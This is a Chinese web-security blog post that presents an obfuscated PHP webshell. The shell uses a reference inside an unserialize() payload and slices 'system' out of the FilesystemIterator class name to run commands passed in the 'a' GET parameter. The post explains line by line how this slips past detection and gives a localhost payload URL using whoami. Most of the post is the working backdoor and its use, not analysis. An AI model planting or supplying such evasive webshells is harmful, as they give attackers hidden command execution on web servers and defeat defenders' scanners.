WEB安全--RCE--webshell bypass2

继WEB安全--RCE--webshell bypass的补充:

六、PHP反序列化

webshell:

php 复制代码
<?php
$s= 
unserialize('a:2:{i:0;O:8:"stdClass":1:{s:1:"a";i:1;}i:1;r:2;}');
$c = "123";
$arr= get_declared_classes();
$i=0;

for($i;$i<count($arr);$i++){
 $i++;
 $s[1]->a=$_GET['a'];
 if($i<97 || $i>=98){
 continue;
 }
 $c=$s[0]->a;
 print(substr(get_declared_classes()[55],4,6)($c));
}
?>

原理:

打印$s:

可以看到$s反序列化后有两个值,但是源码中似乎只有一个stdClass;原因是0是由1引用复制后的值,可以理解为**1的变化会导致0的变化**。

打印$arr:

基于上述两个打印值对源码进行分析,我们不难得出其原理:

一开始$c = "123",进入for循环;

s\[1\]-\>a = _GET'a'一直在接收我们的传参,不过由于if判断,当$i = 97时才会进入下一步;

此时s\[1\]-\>a的值是我们URL传递的参数,而c = s\[0\]-\>a,且s1->a 的值会同步影响s\[0\]-\>a,所以c = $_GET'a'

get_declared_classes()55对应的是FilesystemIterator,通过截取取出system;

最后 print(substr(get_declared_classes()55,4,6)($c)) 就会变成:

print(system($_GET'a'))

payload:

php 复制代码
http://127.0.0.1/rce/bypass.php?a=whoami
相关推荐
米小虾5 小时前
AI Agent 安全实战指南:当智能体开始"不听话",开发者该如何应对?
人工智能·安全·agent
tntxia17 小时前
网络安全漏洞修复(一)
安全
泯泷2 天前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
泯泷2 天前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
Flynt7 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js
冬奇Lab11 天前
Skill 系列(02):Skill 安全风险——三类攻击面的实战测试
人工智能·安全·开源
Aphasia31115 天前
VPN 与内网穿透
安全
Mr_愚人派16 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全
DaLi Yao16 天前
【无标题】
人工智能·安全
Alsn8616 天前
等待学习-学习目录:Docker 容器安全攻防
学习·安全·docker